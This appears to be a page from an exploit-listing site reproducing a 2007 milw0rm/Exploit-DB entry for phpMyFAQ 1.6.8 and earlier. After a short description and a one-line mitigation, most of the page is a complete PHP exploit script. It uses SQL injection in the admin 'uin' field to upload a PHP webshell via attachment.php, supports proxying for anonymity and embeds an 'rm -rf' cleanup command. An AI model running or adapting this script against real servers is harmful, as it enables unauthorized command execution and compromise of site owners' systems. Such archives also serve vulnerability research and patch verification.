Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
phpmyfaq - exploit.company
header-logo
Suggest Exploit
vendor:
phpmyfaq
by:
elgCrew@safe-mail.net
9
CVSS
CRITICAL
Remote Command Execution
CWE
Product Name: phpmyfaq
Affected Version From: 1.6.2008
Affected Version To: 1.6.2008
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

phpmyfaq <= 1.6.8 Remote Command Execution Exploit

This exploit allows an attacker to execute arbitrary commands on a vulnerable phpmyfaq version. The vulnerability exists in the attachment.php file, which does not properly sanitize user input before executing commands. By uploading a malicious PHP file and making a specific POST request to the attachment.php file, an attacker can execute arbitrary commands on the server. The exploit also includes a proxy option for anonymity.

Mitigation:

Upgrade to a version higher than 1.6.8. Implement input validation and sanitization to prevent command injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/php5-cgi -q
<?

/*
Sql injection / remote command execution exploit for phpmyfaq < 1.6.8

Bugtraq:
https://www.securityfocus.com/bid/21944

CVS:
http://thinkforge.org/plugins/scmcvs/cvsweb.php/phpmyfaq/admin/attachment.php.diff?r1=1.7.2.11.2.5;r2=1.7.2.11.2.6;cvsroot=phpmyfaq;f=h

./pmf.php http://xxxx.xxxx.edu/faq/ "<? system('id'); ?>" localhost:4001

elgCrew@safe-mail.net
*/

function do_upload($baseurl, $proxy, $cmd)
{

	$fp = fopen("kebab.php", "w");
	if(!$fp)
		die("Cannot open file for writing");

	$code = "Un1q" . $cmd . "<? system(\"rm -rf ../1337/\"); ?>";
	fwrite($fp, $code);
	fclose($fp);
	
	$sendvars["aktion"] = "save";
        $sendvars["uin"] = "-1' UNION SELECT char(0x61,0x64,0x6d,0x69,0x6e),char(0x61,0x61,0x27,0x20,0x4f,0x52,0x20,0x31,0x3d,0x31,0x20,0x2f,0x2a) /*";
        $sendvars["save"] = "TRUE";
        $sendvars["MAX_FILE_SIZE"] = "100000";
        $sendvars["id"] = "1337";
        $sendvars["userfile"] = '@kebab.php';
        $sendvars["filename"] = "kebab.php";

        $posturl = $baseurl . "/admin/attachment.php";
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $posturl);

        curl_setopt($ch, CURLOPT_PROXY, $proxy);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS, $sendvars);
        echo "=> Uploading file.\n";
        $result = curl_exec($ch);
	curl_close($ch);
	@unlink("kebab.php");
	$get =  $baseurl . "/attachments/1337/kebab.php\n";

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $get);
	curl_setopt($ch, CURLOPT_PROXY, $proxy);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$result = curl_exec($ch);
	if(strstr($result, "Un1q"))
		echo substr($result, 4);
	else
		echo "Not vulnerable / error ?\n";
	curl_close($ch);


}

if($argc < 3)
{
	printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]);
	exit(0);
}
if($argc == 4)
	$proxy = $argv[3];
else
	$proxy = "";

do_upload($argv[1], $proxy, $argv[2]);

?>

# milw0rm.com [2007-03-01]

Navigation

Suggest Exploit

Services By CQR